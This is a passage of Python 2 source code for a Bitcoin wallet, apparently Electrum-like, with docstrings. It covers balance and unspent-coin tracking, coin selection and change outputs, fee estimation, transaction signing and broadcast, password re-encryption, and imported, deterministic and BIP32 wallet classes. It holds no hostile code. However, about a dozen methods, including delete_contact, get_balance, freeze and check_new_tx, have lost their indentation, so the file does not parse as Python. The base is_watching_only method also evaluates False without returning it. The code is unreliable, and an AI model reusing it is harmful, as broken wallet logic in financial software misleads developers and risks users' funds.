        self.storage.put('contacts', self.addressbook, True)
        if label:
            self.set_label(address, label)
def delete_contact(self, addr):
if addr in self.addressbook:
self.addressbook.remove(addr)
self.storage.put('addressbook', self.addressbook, True)
    def fill_addressbook(self):
        """Seed the contact list with recipient addresses of our outgoing transactions."""
        for tx_hash, tx in self.transactions.items():
            is_relevant, is_send, _, _ = self.get_tx_value(tx)
            if is_send:
                for addr in tx.get_output_addresses():
                    # only external addresses we have not recorded yet
                    if not self.is_mine(addr) and addr not in self.addressbook:
                        self.addressbook.append(addr)
        # redo labels
        # self.update_tx_labels()
def get_num_tx(self, address):
n = 0
for tx in self.transactions.values():
if address in tx.get_output_addresses(): n += 1
return n
    def get_tx_value(self, tx, account=None):
        """Delegate value computation of *tx* to Transaction.get_value over our addresses."""
        domain = self.get_account_addresses(account)
        return tx.get_value(domain, self.prevout_values)
    def update_tx_outputs(self, tx_hash):
        """Index the outputs of *tx_hash* and mark our outputs it spends as spent.

        Keys are 'txid:n' strings; prevout_values maps them to amounts and
        spent_outputs accumulates the ones consumed by our transactions.
        """
        tx = self.transactions.get(tx_hash)
        for i, (addr, value) in enumerate(tx.get_outputs()):
            key = tx_hash+ ':%d'%i
            self.prevout_values[key] = value
        for item in tx.inputs:
            if self.is_mine(item.get('address')):
                key = item['prevout_hash'] + ':%d'%item['prevout_n']
                self.spent_outputs.append(key)
    def get_addr_balance(self, address):
        """Return (confirmed, unconfirmed) balance of *address* in satoshis.

        First pass records every output key received at the address; second
        pass walks the history again, subtracting inputs that spend those
        outputs and adding outputs paid to the address.  tx_height == 0 means
        unconfirmed.  A pruned history (['*']) yields (0, 0).
        """
        #assert self.is_mine(address)
        h = self.history.get(address,[])
        if h == ['*']: return 0,0
        c = u = 0
        received_coins = []   # list of coins received at address
        for tx_hash, tx_height in h:
            tx = self.transactions.get(tx_hash)
            if not tx: continue
            for i, (addr, value) in enumerate(tx.get_outputs()):
                if addr == address:
                    key = tx_hash + ':%d'%i
                    received_coins.append(key)
        for tx_hash, tx_height in h:
            tx = self.transactions.get(tx_hash)
            if not tx: continue
            v = 0
            for item in tx.inputs:
                addr = item.get('address')
                if addr == address:
                    key = item['prevout_hash'] + ':%d'%item['prevout_n']
                    value = self.prevout_values.get( key )
                    # only subtract coins we actually saw arrive at this address
                    if key in received_coins:
                        v -= value
            for i, (addr, value) in enumerate(tx.get_outputs()):
                key = tx_hash + ':%d'%i
                if addr == address:
                    v += value
            if tx_height:
                c += v
            else:
                u += v
        return c, u
    def get_account_name(self, k):
        """Display name of account *k*: the user label, else the account's default name."""
        return self.labels.get(k, self.accounts[k].get_name(k))
def get_account_names(self):
account_names = {}
for k in self.accounts.keys():
account_names[k] = self.get_account_name(k)
return account_names
    def get_account_addresses(self, a, include_change=True):
        """Addresses of account *a*, or of all accounts when *a* is None.

        NOTE(review): if *a* is neither None nor a known account id, 'o' is
        never assigned and the final return raises UnboundLocalError — callers
        appear to only pass valid ids; confirm before relying on it.
        """
        if a is None:
            o = self.addresses(include_change)
        elif a in self.accounts:
            ac = self.accounts[a]
            o = ac.get_addresses(0)
            if include_change: o += ac.get_addresses(1)
        return o
    def get_account_balance(self, account):
        """(confirmed, unconfirmed) balance restricted to one account's addresses."""
        return self.get_balance(self.get_account_addresses(account))
    def get_frozen_balance(self):
        """(confirmed, unconfirmed) balance held on frozen addresses."""
        return self.get_balance(self.frozen_addresses)
def get_balance(self, domain=None):
if domain is None: domain = self.addresses(True)
cc = uu = 0
for addr in domain:
c, u = self.get_addr_balance(addr)
cc += c
uu += u
return cc, uu
    def get_unspent_coins(self, domain=None):
        """Collect spendable outputs on *domain* addresses, oldest first.

        Raises if a history entry's transaction is not loaded (wallet not
        synchronized).  Unconfirmed coins (height 0) are rotated to the end of
        the age-sorted list.
        """
        coins = []
        if domain is None: domain = self.addresses(True)
        for addr in domain:
            h = self.history.get(addr, [])
            if h == ['*']: continue
            for tx_hash, tx_height in h:
                tx = self.transactions.get(tx_hash)
                if tx is None: raise Exception("Wallet not synchronized")
                # coinbase txs have the all-zero prevout hash in their single input
                is_coinbase = tx.inputs[0].get('prevout_hash') == '0'*64
                for i, (address, value) in enumerate(tx.get_outputs()):
                    output = {'address':address, 'value':value, 'prevout_n':i}
                    if address != addr: continue
                    key = tx_hash + ":%d"%i
                    if key in self.spent_outputs: continue
                    output['prevout_hash'] = tx_hash
                    output['height'] = tx_height
                    output['coinbase'] = is_coinbase
                    coins.append((tx_height, output))
        # sort by age
        if coins:
            coins = sorted(coins)
            # move height-0 (unconfirmed) entries behind all confirmed ones
            if coins[-1][0] != 0:
                while coins[0][0] == 0:
                    coins = coins[1:] + [ coins[0] ]
        return [x[1] for x in coins]
def set_fee(self, fee):
if self.fee_per_kb != fee:
self.fee_per_kb = fee
self.storage.put('fee_per_kb', self.fee_per_kb, True)
    def get_history(self, address):
        """Thread-safe lookup of the stored history for *address* (None if unknown)."""
        with self.lock:
            return self.history.get(address)
    def get_status(self, h):
        """Electrum-protocol status hash of a history list (None/'*' pass through).

        NOTE: uses Python 2-only str.encode('hex') on the sha256 digest.
        """
        if not h: return None
        if h == ['*']: return '*'
        status = ''
        for tx_hash, height in h:
            status += tx_hash + ':%d:' % height
        return hashlib.sha256( status ).digest().encode('hex')
    def receive_tx_callback(self, tx_hash, tx, tx_height):
        """Network callback: store a newly received transaction and index it."""
        with self.transaction_lock:
            self.add_pubkey_addresses(tx)
            if not self.check_new_tx(tx_hash, tx):
                # may happen due to pruning
                print_error("received transaction that is no longer referenced in history", tx_hash)
                return
            self.transactions[tx_hash] = tx
            self.network.pending_transactions_for_notifications.append(tx)
            self.save_transactions()
            # confirmed txs go to the SPV verifier
            if self.verifier and tx_height>0:
                self.verifier.add(tx_hash, tx_height)
            self.update_tx_outputs(tx_hash)
def save_transactions(self):
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx, True)
    def receive_history_callback(self, addr, hist):
        """Network callback: validate and store the history list for *addr*."""
        if not self.check_new_history(addr, hist):
            raise Exception("error: received history for %s is not consistent with known transactions"%addr)
        with self.lock:
            self.history[addr] = hist
            self.storage.put('addr_history', self.history, True)
        if hist != ['*']:
            for tx_hash, tx_height in hist:
                if tx_height>0:
                    # add it in case it was previously unconfirmed
                    if self.verifier: self.verifier.add(tx_hash, tx_height)
    def get_tx_history(self, account=None):
        """Return [(tx_hash, conf, is_mine, value, fee, running_balance, timestamp)].

        Sorted by verifier position; a synthetic first row reconciles any gap
        between the summed tx values and the actual account balance.
        NOTE: relies on Python 2 dict.items() returning a sortable list.
        """
        if not self.verifier:
            return []
        with self.transaction_lock:
            history = self.transactions.items()
            history.sort(key = lambda x: self.verifier.get_txpos(x[0]))
            result = []
            balance = 0
            for tx_hash, tx in history:
                is_relevant, is_mine, v, fee = self.get_tx_value(tx, account)
                if v is not None: balance += v
            c, u = self.get_account_balance(account)
            if balance != c+u:
                # placeholder row so the running balance column adds up
                result.append( ('', 1000, 0, c+u-balance, None, c+u-balance, None ) )
            balance = c + u - balance
            for tx_hash, tx in history:
                is_relevant, is_mine, value, fee = self.get_tx_value(tx, account)
                if not is_relevant:
                    continue
                if value is not None:
                    balance += value
                conf, timestamp = self.verifier.get_confirmations(tx_hash) if self.verifier else (None, None)
                result.append( (tx_hash, conf, is_mine, value, fee, balance, timestamp) )
        return result
def get_label(self, tx_hash):
label = self.labels.get(tx_hash)
is_default = (label == '') or (label is None)
if is_default: label = self.get_default_label(tx_hash)
return label, is_default
    def get_default_label(self, tx_hash):
        """Synthesize a label for an unlabeled tx: '>addr' for sends, '<addr' for
        receives, '(internal)' for self-transfers; '' if the tx is unknown."""
        tx = self.transactions.get(tx_hash)
        default_label = ''
        if tx:
            is_relevant, is_mine, _, _ = self.get_tx_value(tx)
            if is_mine:
                # outgoing: label after the first external recipient
                for o_addr in tx.get_output_addresses():
                    if not self.is_mine(o_addr):
                        try:
                            default_label = self.labels[o_addr]
                        except KeyError:
                            default_label = '>' + o_addr
                        break
                else:
                    default_label = '(internal)'
            else:
                # incoming: prefer one of our non-change receive addresses
                for o_addr in tx.get_output_addresses():
                    if self.is_mine(o_addr) and not self.is_change(o_addr):
                        break
                else:
                    for o_addr in tx.get_output_addresses():
                        if self.is_mine(o_addr):
                            break
                    else:
                        o_addr = None
                if o_addr:
                    try:
                        default_label = self.labels[o_addr]
                    except KeyError:
                        default_label = '<' + o_addr
        return default_label
    def get_tx_fee(self, tx):
        """Fee of *tx*; subclasses may override."""
        # this method can be overloaded
        return tx.get_fee()
    def estimated_fee(self, tx):
        """Estimate the fee for *tx* from its serialized size, floored at the relay minimum.

        NOTE: hex length / 2 gives the byte size; Python 2 '/' truncates here.
        """
        estimated_size = len(tx.serialize(-1))/2
        fee = int(self.fee_per_kb*estimated_size/1000.)
        if fee < MIN_RELAY_TX_FEE: # and tx.requires_fee(self.verifier):
            fee = MIN_RELAY_TX_FEE
        return fee
    def make_unsigned_transaction(self, outputs, fixed_fee=None, change_addr=None, domain=None, coins=None ):
        """Select coins and build an unsigned Transaction paying *outputs*.

        Returns None when funds are insufficient.  Frozen addresses are
        excluded from coin selection unless explicit *coins* are supplied.
        """
        # check outputs
        for type, data, value in outputs:
            if type == 'op_return':
                assert len(data) < 41, "string too long"
                #assert value == 0
            if type == 'address':
                assert is_address(data), "Address " + data + " is invalid!"
        # get coins
        if not coins:
            if domain is None:
                domain = self.addresses(True)
            for i in self.frozen_addresses:
                if i in domain: domain.remove(i)
            coins = self.get_unspent_coins(domain)
        amount = sum( map(lambda x:x[2], outputs) )
        total = fee = 0
        # NOTE: 'inputs' is the same list object held by tx, so tx.add_input
        # below appears to populate it too — inputs[0] later relies on that.
        inputs = []
        tx = Transaction(inputs, outputs)
        for item in coins:
            # immature coinbase outputs are not spendable yet
            if item.get('coinbase') and item.get('height') + COINBASE_MATURITY > self.network.get_local_height():
                continue
            v = item.get('value')
            total += v
            self.add_input_info(item)
            tx.add_input(item)
            fee = fixed_fee if fixed_fee is not None else self.estimated_fee(tx)
            if total >= amount + fee: break
        else:
            print_error("Not enough funds", total, amount, fee)
            return None
        # change address
        if not change_addr:
            # send change to one of the accounts involved in the tx
            address = inputs[0].get('address')
            account, _ = self.get_address_index(address)
            if not self.use_change or account == IMPORTED_ACCOUNT:
                change_addr = address
            else:
                change_addr = self.accounts[account].get_addresses(1)[-self.gap_limit_for_change]
        # if change is above dust threshold, add a change output.
        change_amount = total - ( amount + fee )
        if fixed_fee is not None and change_amount > 0:
            # Insert the change output at a random position in the outputs
            posn = random.randint(0, len(tx.outputs))
            tx.outputs[posn:posn] = [( 'address', change_addr, change_amount)]
        elif change_amount > DUST_THRESHOLD:
            # Insert the change output at a random position in the outputs
            posn = random.randint(0, len(tx.outputs))
            tx.outputs[posn:posn] = [( 'address', change_addr, change_amount)]
            # recompute fee including change output
            fee = self.estimated_fee(tx)
            # remove change output
            tx.outputs.pop(posn)
            # if change is still above dust threshold, re-add change output.
            change_amount = total - ( amount + fee )
            if change_amount > DUST_THRESHOLD:
                tx.outputs[posn:posn] = [( 'address', change_addr, change_amount)]
                print_error('change', change_amount)
            else:
                print_error('not keeping dust', change_amount)
        else:
            print_error('not keeping dust', change_amount)
        run_hook('make_unsigned_transaction', tx)
        return tx
    def mktx(self, outputs, password, fee=None, change_addr=None, domain= None, coins = None ):
        """Build and (when keys are available) sign a transaction paying *outputs*."""
        tx = self.make_unsigned_transaction(outputs, fee, change_addr, domain, coins)
        keypairs = {}
        self.add_keypairs(tx, keypairs, password)
        if keypairs:
            self.sign_transaction(tx, keypairs, password)
        return tx
    def add_input_info(self, txin):
        """Attach signing metadata (pubkeys, script info, num_sig) to input dict *txin*."""
        address = txin['address']
        account_id, sequence = self.get_address_index(address)
        account = self.accounts[account_id]
        redeemScript = account.redeem_script(*sequence)
        pubkeys = account.get_pubkeys(*sequence)
        x_pubkeys = account.get_xpubkeys(*sequence)
        # sort pubkeys and x_pubkeys, using the order of pubkeys
        pubkeys, x_pubkeys = zip( *sorted(zip(pubkeys, x_pubkeys)))
        txin['pubkeys'] = list(pubkeys)
        txin['x_pubkeys'] = list(x_pubkeys)
        txin['signatures'] = [None] * len(pubkeys)
        if redeemScript:
            # multisig (p2sh) input: two signatures required here
            txin['redeemScript'] = redeemScript
            txin['num_sig'] = 2
        else:
            # single-key input
            txin['redeemPubkey'] = account.get_pubkey(*sequence)
            txin['num_sig'] = 1
    def sign_transaction(self, tx, keypairs, password):
        """Sign *tx* in place with *keypairs* and notify the 'sign_transaction' hook."""
        tx.sign(keypairs)
        run_hook('sign_transaction', tx, password)
    def sendtx(self, tx):
        """Broadcast *tx* and block until the network reports a result."""
        # synchronous
        h = self.send_tx(tx)
        self.tx_event.wait()
        return self.receive_tx(h, tx)
    def send_tx(self, tx):
        """Queue *tx* for broadcast; result arrives via on_broadcast. Returns the txid."""
        # asynchronous
        self.tx_event.clear()
        self.network.send([('blockchain.transaction.broadcast', [str(tx)])], self.on_broadcast)
        return tx.hash()
    def on_broadcast(self, r):
        """Network callback: record the broadcast result and wake any waiter."""
        self.tx_result = r.get('result')
        self.tx_event.set()
    def receive_tx(self, tx_hash, tx):
        """Interpret the broadcast result: (True, txid) on success, (False, error) otherwise."""
        out = self.tx_result
        # a successful broadcast echoes back our transaction hash
        if out != tx_hash:
            return False, "error: " + out
        run_hook('receive_tx', tx, self)
        return True, out
    def update_password(self, old_password, new_password):
        """Re-encrypt all secret material under *new_password* ('' means no password)."""
        if new_password == '':
            new_password = None
        if self.has_seed():
            decoded = self.get_seed(old_password)
            self.seed = pw_encode( decoded, new_password)
            self.storage.put('seed', self.seed, True)
        imported_account = self.accounts.get(IMPORTED_ACCOUNT)
        if imported_account:
            imported_account.update_password(old_password, new_password)
            self.save_accounts()
        # only BIP32-style wallets carry master private keys
        if hasattr(self, 'master_private_keys'):
            for k, v in self.master_private_keys.items():
                b = pw_decode(v, old_password)
                c = pw_encode(b, new_password)
                self.master_private_keys[k] = c
            self.storage.put('master_private_keys', self.master_private_keys, True)
        self.use_encryption = (new_password != None)
        self.storage.put('use_encryption', self.use_encryption,True)
def freeze(self,addr):
if self.is_mine(addr) and addr not in self.frozen_addresses:
self.frozen_addresses.append(addr)
self.storage.put('frozen_addresses', self.frozen_addresses, True)
return True
else:
return False
def unfreeze(self,addr):
if self.is_mine(addr) and addr in self.frozen_addresses:
self.frozen_addresses.remove(addr)
self.storage.put('frozen_addresses', self.frozen_addresses, True)
return True
else:
return False
    def set_verifier(self, verifier):
        """Attach the SPV verifier, feed it confirmed history, prune unverifiable txs.

        NOTE: 'keys() + keys()' concatenation requires Python 2 list-returning
        dict.keys(); same for popping while iterating transactions.keys().
        """
        self.verifier = verifier
        # review transactions that are in the history
        for addr, hist in self.history.items():
            if hist == ['*']: continue
            for tx_hash, tx_height in hist:
                if tx_height>0:
                    # add it in case it was previously unconfirmed
                    self.verifier.add(tx_hash, tx_height)
        # if we are on a pruning server, remove unverified transactions
        vr = self.verifier.transactions.keys() + self.verifier.verified_tx.keys()
        for tx_hash in self.transactions.keys():
            if tx_hash not in vr:
                self.transactions.pop(tx_hash)
    def check_new_history(self, addr, hist):
        """Validate a server-sent history for *addr* against local state.

        Rejects (returns False) histories containing transactions that do not
        touch *addr*.  If accepting the history would orphan a transaction no
        other address references, try to re-verify it via external history
        requests; otherwise drop it locally.  Returns True when consistent.
        """
        # check that all tx in hist are relevant
        if hist != ['*']:
            for tx_hash, height in hist:
                tx = self.transactions.get(tx_hash)
                if not tx: continue
                if not tx.has_address(addr):
                    return False
        # check that we are not "orphaning" a transaction
        old_hist = self.history.get(addr,[])
        if old_hist == ['*']: return True
        for tx_hash, height in old_hist:
            if tx_hash in map(lambda x:x[0], hist): continue
            found = False
            for _addr, _hist in self.history.items():
                if _addr == addr: continue
                if _hist == ['*']: continue
                _tx_hist = map(lambda x:x[0], _hist)
                if tx_hash in _tx_hist:
                    found = True
                    break
            if not found:
                tx = self.transactions.get(tx_hash)
                # tx might not be there
                if not tx: continue
                # already verified?
                if self.verifier.get_height(tx_hash):
                    continue
                # unconfirmed tx
                print_error("new history is orphaning transaction:", tx_hash)
                # check that all outputs are not mine, request histories
                ext_requests = []
                for _addr in tx.get_output_addresses():
                    # assert not self.is_mine(_addr)
                    ext_requests.append( ('blockchain.address.get_history', [_addr]) )
                ext_h = self.network.synchronous_get(ext_requests)
                print_error("sync:", ext_requests, ext_h)
                height = None
                for h in ext_h:
                    if h == ['*']: continue
                    for item in h:
                        if item.get('tx_hash') == tx_hash:
                            height = item.get('height')
                if height:
                    print_error("found height for", tx_hash, height)
                    self.verifier.add(tx_hash, height)
                else:
                    print_error("removing orphaned tx from history", tx_hash)
                    self.transactions.pop(tx_hash)
        return True
def check_new_tx(self, tx_hash, tx):
# 1 check that tx is referenced in addr_history.
addresses = []
for addr, hist in self.history.items():
if hist == ['*']:continue
for txh, height in hist:
if txh == tx_hash:
addresses.append(addr)
if not addresses:
return False
# 2 check that referencing addresses are in the tx
for addr in addresses:
if not tx.has_address(addr):
return False
return True
    def start_threads(self, network):
        """Start the SPV verifier and synchronizer threads (offline: leave both None)."""
        from verifier import TxVerifier
        self.network = network
        if self.network is not None:
            self.verifier = TxVerifier(self.network, self.storage)
            self.verifier.start()
            self.set_verifier(self.verifier)
            self.synchronizer = WalletSynchronizer(self, network)
            self.synchronizer.start()
        else:
            self.verifier = None
            self.synchronizer =None
def stop_threads(self):
if self.network:
self.verifier.stop()
self.synchronizer.stop()
    def restore(self, cb):
        """Restore wallet contents; base class has nothing to restore."""
        pass
    def get_accounts(self):
        """Return the mapping of account id -> account object."""
        return self.accounts
    def add_account(self, account_id, account):
        """Register *account* under *account_id* and persist all accounts."""
        self.accounts[account_id] = account
        self.save_accounts()
def save_accounts(self):
d = {}
for k, v in self.accounts.items():
d[k] = v.dump()
self.storage.put('accounts', d, True)
def can_import(self):
return not self.is_watching_only()
def can_export(self):
return not self.is_watching_only()
    def is_used(self, address):
        """Return (history length, fully-spent?) for *address*."""
        h = self.history.get(address,[])
        c, u = self.get_addr_balance(address)
        # used-and-empty: has history and confirmed balance cancels unconfirmed
        return len(h), len(h) > 0 and c == -u
def address_is_old(self, address, age_limit=2):
age = -1
h = self.history.get(address, [])
if h == ['*']:
return True
for tx_hash, tx_height in h:
if tx_height == 0:
tx_age = 0
else:
tx_age = self.network.get_local_height() - tx_height + 1
if tx_age > age:
age = tx_age
return age > age_limit
    def can_sign(self, tx):
        """Whether this wallet can add signatures to *tx*; overridden by subclasses."""
        pass
def is_watching_only(self):
False
def can_change_password(self):
return not self.is_watching_only()
class Imported_Wallet(Abstract_Wallet):
    """Wallet holding only individually imported keys/addresses; no seed, no HD derivation."""
    wallet_type = 'imported'
    def __init__(self, storage):
        Abstract_Wallet.__init__(self, storage)
        # ensure the imported pseudo-account always exists
        a = self.accounts.get(IMPORTED_ACCOUNT)
        if not a:
            self.accounts[IMPORTED_ACCOUNT] = ImportedAccount({'imported':{}})
    def is_watching_only(self):
        """Watching-only when no imported entry carries key material."""
        acc = self.accounts[IMPORTED_ACCOUNT]
        n = acc.keypairs.values()
        return n == [(None, None)] * len(n)
    def has_seed(self):
        """Imported wallets never have a seed."""
        return False
    def is_deterministic(self):
        """Imported wallets are not deterministic."""
        return False
    def check_password(self, password):
        """Raise if *password* cannot decrypt the first imported key."""
        self.accounts[IMPORTED_ACCOUNT].get_private_key((0,0), self, password)
    def is_used(self, address):
        """(history length, False): spent-ness is not tracked for imported addresses."""
        h = self.history.get(address,[])
        return len(h), False
    def get_master_public_keys(self):
        """No master keys for imported wallets."""
        return {}
    def is_beyond_limit(self, address, account, is_change):
        """Gap limits do not apply to imported addresses."""
        return False
class Deterministic_Wallet(Abstract_Wallet):
    """Base class for seed-based wallets that derive addresses deterministically."""
    def __init__(self, storage):
        Abstract_Wallet.__init__(self, storage)
    def has_seed(self):
        """True once a (possibly encrypted) seed string is present."""
        return self.seed != ''
    def is_deterministic(self):
        return True
    def is_watching_only(self):
        """Deterministic wallets are watching-only exactly when they lack a seed."""
        return not self.has_seed()
    def add_seed(self, seed, password):
        """Store the wallet seed (encrypted if *password* given); one-shot only."""
        if self.seed:
            raise Exception("a seed exists")
        self.seed_version, self.seed = self.format_seed(seed)
        if password:
            self.seed = pw_encode( self.seed, password)
            self.use_encryption = True
        else:
            self.use_encryption = False
        self.storage.put('seed', self.seed, True)
        self.storage.put('seed_version', self.seed_version, True)
        self.storage.put('use_encryption', self.use_encryption,True)
    def get_seed(self, password):
        """Decrypt and return the stored seed."""
        return pw_decode(self.seed, password)
    def get_mnemonic(self, password):
        """The mnemonic is the seed itself for this wallet family."""
        return self.get_seed(password)
    def change_gap_limit(self, value):
        """Set a new gap limit; shrinking trims trailing unused addresses.

        NOTE(review): the shrink branch indexes accounts as account[0] —
        this looks like a legacy list-shaped account layout; confirm before
        relying on it with current account objects.
        """
        if value >= self.gap_limit:
            self.gap_limit = value
            self.storage.put('gap_limit', self.gap_limit, True)
            #self.interface.poke('synchronizer')
            return True
        elif value >= self.min_acceptable_gap():
            for key, account in self.accounts.items():
                addresses = account[0]
                k = self.num_unused_trailing_addresses(addresses)
                n = len(addresses) - k + value
                addresses = addresses[0:n]
                self.accounts[key][0] = addresses
            self.gap_limit = value
            self.storage.put('gap_limit', self.gap_limit, True)
            self.save_accounts()
            return True
        else:
            return False
    def num_unused_trailing_addresses(self, addresses):
        """Count consecutive history-free addresses at the end of *addresses*."""
        k = 0
        for a in addresses[::-1]:
            if self.history.get(a):break
            k = k + 1
        return k
    def min_acceptable_gap(self):
        """Smallest gap limit that keeps every used address reachable."""
        # fixme: this assumes wallet is synchronized
        n = 0
        nmax = 0
        for account in self.accounts.values():
            addresses = account.get_addresses(0)
            k = self.num_unused_trailing_addresses(addresses)
            for a in addresses[0:-k]:
                if self.history.get(a):
                    n = 0
                else:
                    n += 1
                    if n > nmax: nmax = n
        return nmax + 1
    def default_account(self):
        """The primary account, stored under id '0'."""
        return self.accounts['0']
    def create_new_address(self, account=None, for_change=0):
        """Derive the next address on the given branch and register it."""
        if account is None:
            account = self.default_account()
        address = account.create_new_address(for_change)
        self.add_address(address)
        return address
    def add_address(self, address):
        """Track *address*: empty history, synchronizer subscription, persistence."""
        if address not in self.history:
            self.history[address] = []
        if self.synchronizer:
            self.synchronizer.add(address)
        self.save_accounts()
    def synchronize(self):
        """Let every account generate addresses up to the gap limit."""
        for account in self.accounts.values():
            account.synchronize(self)
    def restore(self, callback):
        """Regenerate addresses from seed, reporting progress via *callback*.

        NOTE: uses Python 2-only apply().
        """
        from i18n import _
        def wait_for_wallet():
            self.set_up_to_date(False)
            while not self.is_up_to_date():
                msg = "%s\n%s %d"%(
                    _("Please wait..."),
                    _("Addresses generated:"),
                    len(self.addresses(True)))
                apply(callback, (msg,))
                time.sleep(0.1)
        def wait_for_network():
            while not self.network.is_connected():
                msg = "%s \n" % (_("Connecting..."))
                apply(callback, (msg,))
                time.sleep(0.1)
        # wait until we are connected, because the user might have selected another server
        if self.network:
            wait_for_network()
            wait_for_wallet()
        else:
            self.synchronize()
        self.fill_addressbook()
    def is_beyond_limit(self, address, account, is_change):
        """True if *address* lies past a run of gap_limit unused addresses."""
        if type(account) == ImportedAccount:
            return False
        addr_list = account.get_addresses(is_change)
        i = addr_list.index(address)
        prev_addresses = addr_list[:max(0, i)]
        limit = self.gap_limit_for_change if is_change else self.gap_limit
        if len(prev_addresses) < limit:
            return False
        prev_addresses = prev_addresses[max(0, i - limit):]
        for addr in prev_addresses:
            if self.history.get(addr):
                return False
        return True
    def get_action(self):
        """Next required setup step, or None when the wallet is complete."""
        if not self.get_master_public_key():
            return 'create_seed'
        if not self.accounts:
            return 'create_accounts'
    def get_master_public_keys(self):
        """Map account display names to their (joined) master public keys."""
        out = {}
        for k, account in self.accounts.items():
            name = self.get_account_name(k)
            mpk_text = '\n\n'.join( account.get_master_pubkeys() )
            out[name] = mpk_text
        return out
class BIP32_Wallet(Deterministic_Wallet):
    """Abstract base for wallets built on BIP32 extended keys."""
    # abstract class, bip32 logic
    gap_limit = 20
    def __init__(self, storage):
        Deterministic_Wallet.__init__(self, storage)
        # name -> xpub / encrypted xprv, keyed by root names like 'x/' or 'x1/'
        self.master_public_keys = storage.get('master_public_keys', {})
        self.master_private_keys = storage.get('master_private_keys', {})
    def is_watching_only(self):
        """Watching-only when no master private key is stored."""
        return not bool(self.master_private_keys)
    def get_master_public_key(self):
        """The xpub of this wallet's root branch."""
        return self.master_public_keys.get(self.root_name)
    def get_master_private_key(self, account, password):
        """Decrypt and return the xprv stored for *account*, if any."""
        k = self.master_private_keys.get(account)
        if not k: return
        xprv = pw_decode(k, password)
        return xprv
    def check_password(self, password):
        """Raise unless *password* decrypts an xprv matching the stored root xpub."""
        xpriv = self.get_master_private_key(self.root_name, password)
        xpub = self.master_public_keys[self.root_name]
        # compare the chain-code/key fields of the deserialized extended keys
        assert deserialize_xkey(xpriv)[3] == deserialize_xkey(xpub)[3]
    def add_master_public_key(self, name, xpub):
        """Store an xpub under *name* and persist."""
        self.master_public_keys[name] = xpub
        self.storage.put('master_public_keys', self.master_public_keys, True)
    def add_master_private_key(self, name, xpriv, password):
        """Store an xprv (encrypted with *password*) under *name* and persist."""
        self.master_private_keys[name] = pw_encode(xpriv, password)
        self.storage.put('master_private_keys', self.master_private_keys, True)
    def derive_xkeys(self, root, derivation, password):
        """Derive (xpub, xprv) at *derivation* from the stored root private key."""
        x = self.master_private_keys[root]
        root_xprv = pw_decode(x, password)
        xprv, xpub = bip32_private_derivation(root_xprv, root, derivation)
        return xpub, xprv
    def can_sign(self, tx):
        """True if we hold a key for any of *tx*'s unsigned inputs."""
        if self.is_watching_only():
            return False
        if tx.is_complete():
            return False
        addr_list, xpub_list = tx.inputs_to_sign()
        for addr in addr_list:
            if self.is_mine(addr):
                return True
        # xpubs we hold the matching private key for
        mpk = [ self.master_public_keys[k] for k in self.master_private_keys.keys() ]
        for xpub, sequence in xpub_list:
            if xpub in mpk:
                return True
        return False
    def create_master_keys(self, password):
        """Derive and store the root key pair from this wallet's seed."""
        seed = self.get_seed(password)
        self.add_cosigner_seed(seed, self.root_name, password)
    def add_cosigner_seed(self, seed, name, password):
        """Derive a cosigner branch from *seed* and store both xpub and xprv."""
        # we don't store the seed, only the master xpriv
        xprv, xpub = bip32_root(self.mnemonic_to_seed(seed,''))
        xprv, xpub = bip32_private_derivation(xprv, "m/", self.root_derivation)
        self.add_master_public_key(name, xpub)
        self.add_master_private_key(name, xprv, password)
    def add_cosigner_xpub(self, seed, name):
        """Derive a cosigner branch from *seed* but store only the xpub."""
        # store only master xpub
        xprv, xpub = bip32_root(self.mnemonic_to_seed(seed,''))
        xprv, xpub = bip32_private_derivation(xprv, "m/", self.root_derivation)
        self.add_master_public_key(name, xpub)
    def mnemonic_to_seed(self, seed, password):
        """BIP39-style mnemonic to binary seed conversion."""
        return Mnemonic.mnemonic_to_seed(seed, password)
    def make_seed(self):
        """Generate a fresh mnemonic in the configured language."""
        lang = self.storage.config.get('language')
        return Mnemonic(lang).make_seed()
    def format_seed(self, seed):
        """Normalize whitespace; returns (seed_version, seed)."""
        return NEW_SEED_VERSION, ' '.join(seed.split())
class BIP32_Simple_Wallet(BIP32_Wallet):
    """Seedless wallet built from a single xprv or xpub (one BIP32 account)."""
    # Wallet with a single BIP32 account, no seed
    # gap limit 20
    root_name = 'x/'
    wallet_type = 'xpub'
    def create_xprv_wallet(self, xprv, password):
        """Initialize from an extended private key (spending wallet)."""
        xpub = bitcoin.xpub_from_xprv(xprv)
        account = BIP32_Account({'xpub':xpub})
        self.storage.put('seed_version', self.seed_version, True)
        self.add_master_private_key(self.root_name, xprv, password)
        self.add_master_public_key(self.root_name, xpub)
        self.add_account('0', account)
    def create_xpub_wallet(self, xpub):
        """Initialize from an extended public key (watching-only wallet)."""
        account = BIP32_Account({'xpub':xpub})
        self.storage.put('seed_version', self.seed_version, True)
        self.add_master_public_key(self.root_name, xpub)
        self.add_account('0', account)
class BIP32_HD_Wallet(BIP32_Wallet):
    """BIP32 wallet that can derive multiple numbered accounts on demand."""
    # wallet that can create accounts
    def __init__(self, storage):
        # (id, xpub, first_address) of the pre-derived next account, or None
        self.next_account = storage.get('next_account', None)
        BIP32_Wallet.__init__(self, storage)
    def can_create_accounts(self):
        """Accounts can be created only when the root private key is held."""
        return self.root_name in self.master_private_keys.keys()
    def addresses(self, b=True):
        """All account addresses plus the pre-derived next account's first address."""
        l = BIP32_Wallet.addresses(self, b)
        if self.next_account:
            next_address = self.next_account[2]
            if next_address not in l:
                l.append(next_address)
        return l
    def get_address_index(self, address):
        """Resolve *address*, treating the pending next-account address as (0,0)."""
        if self.next_account:
            next_id, next_xpub, next_address = self.next_account
            if address == next_address:
                return next_id, (0,0)
        return BIP32_Wallet.get_address_index(self, address)
    def num_accounts(self):
        """First unused numeric account index (i.e. number of BIP32 accounts)."""
        keys = []
        for k, v in self.accounts.items():
            if type(v) != BIP32_Account:
                continue
            keys.append(k)
        i = 0
        while True:
            account_id = '%d'%i
            if account_id not in keys:
                break
            i += 1
        return i
    def get_next_account(self, password):
        """Derive the next account's keys; returns (account_id, xpub, first address)."""
        account_id = '%d'%self.num_accounts()
        derivation = self.root_name + "%d'"%int(account_id)
        xpub, xprv = self.derive_xkeys(self.root_name, derivation, password)
        self.add_master_public_key(derivation, xpub)
        if xprv:
            self.add_master_private_key(derivation, xprv, password)
        account = BIP32_Account({'xpub':xpub})
        addr = account.first_address()
        self.add_address(addr)
        return account_id, xpub, addr
    def create_main_account(self, password):
        """Create account 0; only valid on a fresh wallet."""
        # First check the password is valid (this raises if it isn't).
        self.check_password(password)
